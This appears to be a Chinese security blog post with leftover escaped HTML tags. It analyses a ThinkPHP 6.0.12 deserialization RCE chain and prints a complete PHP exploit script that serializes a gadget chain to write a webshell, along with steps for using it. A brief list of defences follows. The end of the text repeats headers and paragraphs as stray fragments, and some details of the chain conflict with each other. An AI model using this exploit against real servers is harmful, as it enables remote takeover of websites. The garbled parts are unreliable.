ThinkPHP 6.0.12 反序列化 RCE 漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析 ThinkPHP 6.0.12 版本中存在的反序列化远程代码执行(RCE)漏洞。该漏洞通过精心构造的反序列化链，最终实现任意文件写入，从而达到远程代码执行的目的。<\/p>

环境准备<\/h2>

使用 Composer 安装 ThinkPHP 6.0.12：<\/p>

composer create-project topthink\/think=<\/span>6.0.12 tp612
<\/span><\/span><\/code><\/pre><\/li>

添加反序列化入口点（在实际应用中，需要找到或创建一个反序列化入口）<\/p>
<\/li>
<\/ol>
漏洞分析<\/h2>
漏洞链组成<\/h3>
该漏洞链由多个关键点组成，最终实现任意文件写入：<\/p>

起点<\/strong>：利用 __destruct<\/code> 或 __wakeup<\/code> 魔术方法作为反序列化入口<\/li>
中间链<\/strong>：通过多个类的魔术方法和属性控制实现链式调用<\/li>
终点<\/strong>：最终调用 file_put_contents<\/code> 实现任意文件写入<\/li>
<\/ol>
关键调用链<\/h3>
think\Model\Pivot -> think\Model::__construct() -> think\route\Url::__construct() 
-> think\console\Output::__call() -> think\console\Output::block() 
-> think\console\Output::write() -> League\Flysystem\File::write() 
-> think\session\driver\File::write() -> think\session\driver\File::writeFile() 
-> file_put_contents()
<\/code><\/pre>
关键类分析<\/h3>
1. think\console\Output 类<\/h4>
关键方法 __call<\/code>：<\/p>
public<\/span> function<\/span> __call($method, $args)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (in_array<\/span>($method, $this-><\/span>styles<\/span>)) {
<\/span><\/span>        array_unshift<\/span>($args, $method);
<\/span><\/span>        return<\/span> $this-><\/span>block<\/span>(...<\/span>$args);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制 $this->styles<\/code> 可以调用 block<\/code> 方法，进而调用 write<\/code> 方法。<\/p>
2. League\Flysystem\File 类<\/h4>
关键方法 write<\/code>：<\/p>
public<\/span> function<\/span> write<\/span>($content)
<\/span><\/span>{
<\/span><\/span>    $this-><\/span>filesystem<\/span>-><\/span>write<\/span>($this-><\/span>path<\/span>, $content);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制 $this->filesystem<\/code> 和 $this->path<\/code> 可以调用任意类的 write<\/code> 方法。<\/p>
3. think\session\driver\File 类<\/h4>
关键方法 write<\/code>：<\/p>
public<\/span> function<\/span> write<\/span>($sessID, $sessData)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (!<\/span>$this-><\/span>config<\/span>['data_compress'<\/span>]) {
<\/span><\/span>        return<\/span> $this-><\/span>writeFile<\/span>($this-><\/span>getFileName<\/span>($sessID), $sessData);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制 $this->config['data_compress']<\/code> 为 false，可以绕过压缩直接调用 writeFile<\/code>。<\/p>
关键方法 writeFile<\/code>：<\/p>
protected<\/span> function<\/span> writeFile<\/span>($path, $data)
<\/span><\/span>{
<\/span><\/span>    return<\/span> file_put_contents<\/span>($path, $data);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>这是最终实现任意文件写入的关键点。<\/p>
漏洞利用条件<\/h3>

存在反序列化入口<\/li>
目标系统使用 ThinkPHP 6.0.12 版本<\/li>
目标系统加载了相关类文件<\/li>
<\/ol>
漏洞利用<\/h2>
EXP 构造<\/h3>
完整 EXP 构造如下：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think\model\concern<\/span> {
<\/span><\/span>    trait<\/span> Attribute<\/span> {
<\/span><\/span>        private<\/span> $data =<\/span> ['huahua'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\view\driver<\/span> {
<\/span><\/span>    class<\/span> Php<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\session\driver<\/span> {
<\/span><\/span>    class<\/span> File<\/span> { }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> League\Flysystem<\/span> {
<\/span><\/span>    class<\/span> File<\/span> {
<\/span><\/span>        protected<\/span> $path;
<\/span><\/span>        protected<\/span> $filesystem;
<\/span><\/span>        public<\/span> function<\/span> __construct($File){
<\/span><\/span>            $this-><\/span>path<\/span> =<\/span> 'huahua.php'<\/span>;
<\/span><\/span>            $this-><\/span>filesystem<\/span> =<\/span> $File;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\console<\/span> {
<\/span><\/span>    use<\/span> League\Flysystem\File<\/span>;
<\/span><\/span>    class<\/span> Output<\/span> {
<\/span><\/span>        protected<\/span> $styles =<\/span> [];
<\/span><\/span>        private<\/span> $handle;
<\/span><\/span>        public<\/span> function<\/span> __construct($File){
<\/span><\/span>            $this-><\/span>styles<\/span>[] =<\/span> 'getDomainBind'<\/span>;
<\/span><\/span>            $this-><\/span>handle<\/span> =<\/span> new<\/span> File<\/span>($File);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>        use<\/span> model\concern\Attribute<\/span>;
<\/span><\/span>        private<\/span> $lazySave;
<\/span><\/span>        protected<\/span> $withEvent;
<\/span><\/span>        protected<\/span> $table;
<\/span><\/span>        function<\/span> __construct($cmd, $File){
<\/span><\/span>            $this-><\/span>lazySave<\/span> =<\/span> true<\/span>;
<\/span><\/span>            $this-><\/span>withEvent<\/span> =<\/span> false<\/span>;
<\/span><\/span>            $this-><\/span>table<\/span> =<\/span> new<\/span> route\Url<\/span>(new<\/span> Middleware<\/span>, new<\/span> console\Output<\/span>($File), $cmd);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> Middleware<\/span> {
<\/span><\/span>        public<\/span> $request =<\/span> 2333<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span> {
<\/span><\/span>    use<\/span> think\Model<\/span>;
<\/span><\/span>    class<\/span> Pivot<\/span> extends<\/span> Model<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\route<\/span> {
<\/span><\/span>    class<\/span> Url<\/span> {
<\/span><\/span>        protected<\/span> $url =<\/span> 'a:'<\/span>;
<\/span><\/span>        protected<\/span> $domain;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        protected<\/span> $route;
<\/span><\/span>        function<\/span> __construct($app, $route, $cmd){
<\/span><\/span>            $this-><\/span>domain<\/span> =<\/span> $cmd;
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> $app;
<\/span><\/span>            $this-><\/span>route<\/span> =<\/span> $route;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> think\Model\Pivot<\/span>('<?php phpinfo(); exit(); ?>'<\/span>, new<\/span> think\session\driver\File<\/span>)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

构造恶意序列化数据<\/li>
找到或创建反序列化入口点<\/li>
发送恶意序列化数据<\/li>
服务器反序列化数据后会在根目录写入 sess_huahua.php<\/code> 文件<\/li>
访问写入的 webshell 文件执行任意代码<\/li>
<\/ol>
文件写入控制<\/h3>
通过控制以下参数可以自定义写入的文件和内容：<\/p>

League\Flysystem\File::$path<\/code> - 控制写入的文件名<\/li>
think\Model\Pivot<\/code> 构造函数的第一个参数 - 控制写入的文件内容<\/li>
think\session\driver\File<\/code> 的配置可以控制写入路径<\/li>
<\/ol>
防御措施<\/h2>

升级 ThinkPHP 到最新版本<\/li>
避免不可信数据的反序列化<\/li>
使用 PHP 的 unserialize_callback_func<\/code> 或 allowed_classes<\/code> 限制反序列化的类<\/li>
对用户输入进行严格过滤<\/li>
<\/ol>
总结<\/h2>
该漏洞通过精心构造的反序列化链，利用 ThinkPHP 6.0.12 中的多个类和方法，最终实现任意文件写入。漏洞利用需要满足特定条件，但一旦存在反序列化入口，攻击者可以完全控制服务器。开发者应当重视反序列化操作的安全性，采取适当的防御措施。<\/p>

ThinkPHP 6.0.12 反序列化 RCE 漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析 ThinkPHP 6.0.12 版本中存在的反序列化远程代码执行(RCE)漏洞。该漏洞通过精心构造的反序列化链，最终实现任意文件写入，从而达到远程代码执行的目的。<\/p>

漏洞分析<\/h2>

关键类分析<\/h3>

漏洞利用<\/h2>

漏洞概述<\/h2>
本文详细分析 ThinkPHP 6.0.12 版本中存在的反序列化远程代码执行(RCE)漏洞。该漏洞通过精心构造的反序列化链，最终实现任意文件写入，从而达到远程代码执行的目的。<\/p>